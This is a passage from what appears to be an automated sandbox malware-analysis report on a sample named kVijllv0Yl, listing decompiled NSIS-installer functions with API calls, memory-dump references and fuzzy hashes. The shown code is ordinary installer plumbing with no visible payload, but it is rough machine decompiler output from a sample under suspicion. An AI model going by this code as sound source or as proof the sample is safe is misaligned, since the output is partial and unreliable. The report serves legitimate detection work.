                  • DeleteObject.GDI32(00000000), ref: 00401D10
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                  • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                  0x00404618
                  0x0040461c
                  0x00404624
                  0x00404627
                  0x00404628
                  0x0040462a
                  0x0040462c
                  0x0040462f
                  0x0040462f
                  0x00404636
                  0x0040463c
                  0x0040463c
                  0x00404643
                  0x0040464e
                  0x0040464f
                  0x00404652
                  0x00404652
                  0x0040465f
                  0x0040466a
                  0x0040466d
                  0x0040467f
                  0x00404686
                  0x00404687
                  0x00404696
                  0x004046a6
                  0x004046c2

                  APIs
                  • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                  • wsprintfA.USER32 ref: 004046A6
                  • SetDlgItemTextA.USER32 ref: 004046B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s
                  • API String ID: 3540041739-3551169577
                  • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                  • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                  0x00401bb6
                  0x00401bc2
                  0x00401bc5
                  0x00401bce
                  0x00401bce
                  0x00401bd1
                  0x00401bd5
                  0x00401bde
                  0x00401bde
                  0x00401be1
                  0x00401be5
                  0x00401be7
                  0x00401c34
                  0x00401c36
                  0x00401c3f
                  0x00401c47
                  0x00401c4a
                  0x00401c4a
                  0x00401c53
                  0x00000000
                  0x00401be9
                  0x00401bf0
                  0x00401bf2
                  0x00401bfa
                  0x00401bfd
                  0x00401c25
                  0x00401c59
                  0x00401c59
                  0x00401bff
                  0x00401c0d
                  0x00401c15
                  0x00401c18
                  0x00401c18
                  0x00401bfd
                  0x00401c5c
                  0x00401c5f
                  0x00401c65
                  0x00402825
                  0x00402825
                  0x00402880
                  0x0040288c

                  APIs
                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                  • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                  0x004052ee
                  0x0040530a
                  0x00405312
                  0x00405317
                  0x00000000
                  0x0040531d
                  0x00405321

                  APIs
                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                  • CloseHandle.KERNEL32(?), ref: 00405317
                  Strings
                  • Error launching installer, xrefs: 004052F8
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                  • API String ID: 3712363035-4043152584
                  • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                  • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                  0x00405579
                  0x00405590
                  0x00405598
                  0x00405598
                  0x004055a0

                  APIs
                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                  • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 2659869361-3936084776
                  • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                  • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                  0x00401ec7
                  0x00401ecf
                  0x00401ed4
                  0x00401ed9
                  0x00401edd
                  0x00401ee0
                  0x00401ee2
                  0x00401ee9
                  0x00401ef2
                  0x00401efa
                  0x00401efd
                  0x00401f12
                  0x00401f18
                  0x00401f2b
                  0x00401f34
                  0x00401f40
                  0x00401f45
                  0x00401f45
                  0x00401f2b
                  0x00401f48
                  0x00401b75
                  0x00401b75
                  0x00401efd
                  0x00402880
                  0x0040288c

                  APIs
                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                  • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                  • String ID:
                  • API String ID: 1404258612-0
                  • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                  • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                  0x00401d29
                  0x00401d42
                  0x00401d4c
                  0x00401d51
                  0x00401d5c
                  0x00401d63
                  0x00401d75
                  0x00401d7b
                  0x00401d80
                  0x00401d8a
                  0x004024aa
                  0x00401561
                  0x00402825
                  0x00402880
                  0x0040288c

                  APIs
                  • GetDC.USER32(?), ref: 00401D22
                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                  • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirect
                  • String ID:
                  • API String ID: 3272661963-0
                  • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                  • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403897 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                  0x0040389b
                  0x004038a0
                  0x004038a6
                  0x004038ab
                  0x004038ab
                  0x004038b3
                  0x00000000
                  0x00000000
                  0x004038bb
                  0x004038c3
                  0x004038c5
                  0x004038cb
                  0x004038cb
                  0x004038cd
                  0x004038d9
                  0x00000000
                  0x00000000
                  0x004038dd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038df
                  0x004038e4
                  0x004038ed
                  0x004038f3
                  0x004038f8
                  0x0040390c
                  0x00403917
                  0x0040392f
                  0x00403935
                  0x0040393a
                  0x00403942
                  0x00403963
                  0x00403963
                  0x00403963
                  0x00403944
                  0x00403946
                  0x00403946
                  0x0040394a
                  0x00403951
                  0x00403951
                  0x00403956
                  0x0040395c
                  0x0040395c
                  0x00000000
                  0x00403946
                  0x004038fa
                  0x004038ff
                  0x00403908
                  0x00403901
                  0x00403901
                  0x00403901
                  0x004038ff

                  APIs
                  • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: TextWindow
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 530164218-3512041753
                  • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                  • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                  0x00404d7f
                  0x00404da4
                  0x00404dc4
                  0x00404dc7
                  0x00404dca
                  0x00404de1
                  0x00404de7
                  0x00404dee
                  0x00404df5
                  0x00404dfc
                  0x00404e01
                  0x00404e07
                  0x00000000
                  0x00404e17
                  0x00404db1
                  0x00404e04
                  0x00404e04
                  0x00000000
                  0x00404e04
                  0x00404dbd
                  0x00404dbf
                  0x00000000
                  0x00404dbf
                  0x00404d85
                  0x00000000
                  0x00000000
                  0x00404d8c
                  0x00000000

                  APIs
                  • IsWindowVisible.USER32(?), ref: 00404DA9
                  • CallWindowProcA.USER32 ref: 00404E17
                    • Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                  • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
